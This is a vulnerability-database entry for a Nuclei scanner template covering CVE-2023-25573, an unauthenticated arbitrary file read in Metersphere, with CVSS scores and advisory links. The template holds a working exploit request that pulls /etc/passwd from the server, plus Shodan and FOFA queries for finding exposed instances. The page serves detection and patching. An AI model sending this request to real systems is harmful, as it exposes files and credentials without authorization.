Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-25573
HistorySep 14, 2023 - 2:59 p.m.

Metersphere - Arbitrary File Read

2023-09-1414:59:27
ProjectDiscovery
github.com
8
cve2023
metersphere
lfi
access
sensitive information

CVSS3

8.6

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

AI Score

7.7

Confidence

High

EPSS

0.117

Percentile

95.4%

Metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1
id: CVE-2023-25573

info:
  name: Metersphere - Arbitrary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    Metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information, such as configuration files, credentials, and other sensitive data.
  remediation: Users are advised to upgrade. There are no known workarounds for this vulnerability.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Metersphere%20file%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2023-25573.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-25573
    - https://github.com/metersphere/metersphere/security/advisories/GHSA-mcwr-j9vm-5g8h
    - https://github.com/20142995/sectool
    - https://github.com/KayCHENvip/vulnerability-poc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-25573
    cwe-id: CWE-862
    epss-score: 0.04496
    epss-percentile: 0.92455
    cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: metersphere
    product: metersphere
    shodan-query: http.html:"metersphere"
    fofa-query:
      - body="Metersphere"
      - body="metersphere"
      - title="metersphere"
  tags: cve,cve2023,metersphere,lfi
variables:
  str: "{{rand_base(4)}}"
  rand: "{{rand_base(3)}}"

http:
  - raw:
      - |
        POST /api/jmeter/download/files HTTP/1.1
        Content-Type: application/json

        {"reportId":"{{str}}","bodyFiles":[{"id":"{{rand}}","name":"/etc/passwd"}]}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '/etc/passwd'

      - type: word
        part: header
        words:
          - 'filename="{{str}}.zip"'
          - 'application/octet-stream'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a3afd864f1bf88b796f687c498073126b9ad910191e003757e169f65977764d1022004c02947788e53dd7d2b89786adef8739e8b6268a4696b89e5d4371dcdeea76b:922c64590222798bb761d5b6d8e72950

CVSS3

8.6

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

AI Score

7.7

Confidence

High

EPSS

0.117

Percentile

95.4%

Related for NUCLEI:CVE-2023-25573